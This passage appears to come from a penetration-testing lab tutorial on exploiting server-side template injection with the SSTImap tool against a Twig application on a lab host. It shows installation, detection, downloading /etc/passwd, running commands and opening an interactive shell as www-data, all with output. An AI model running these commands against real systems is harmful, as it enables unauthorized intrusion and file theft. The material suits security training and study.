Installation

[!bash!]$ git clone https://github.com/vladko312/SSTImap
 
[!bash!]$ cd SSTImap
 
[!bash!]$ pip3 install -r requirements.txt

Exploit

[!bash!]$ python3 sstimap.py -u http://172.17.0.2/index.php?name=test
 
<SNIP>
 
[+] SSTImap identified the following injection point:
 
  Query parameter: name
  Engine: Twig
  Injection: *
  Context: text
  OS: Linux
  Technique: render
  Capabilities:
    Shell command execution: ok
    Bind and reverse shell: ok
    File write: ok
    File read: ok
    Code evaluation: ok, php code

To download a remote file to our local machine, we can use -D flag:

[!bash!]$ python3 sstimap.py -u http://172.17.0.2/index.php?name=test -D '/etc/passwd' './passwd'
 
<SNIP>
 
[+] File downloaded correctly

Additionally, we can execute a system command using the -S flag:

[!bash!]$ python3 sstimap.py -u http://172.17.0.2/index.php?name=test -S id
 
<SNIP>
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Alternatively, we can use --os-shell to obtain an interactive shell:

[!bash!]$ python3 sstimap.py -u http://172.17.0.2/index.php?name=test --os-shell
 
<SNIP>
 
[+] Run commands on the operating system.
Linux $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
Linux $ whoami
www-data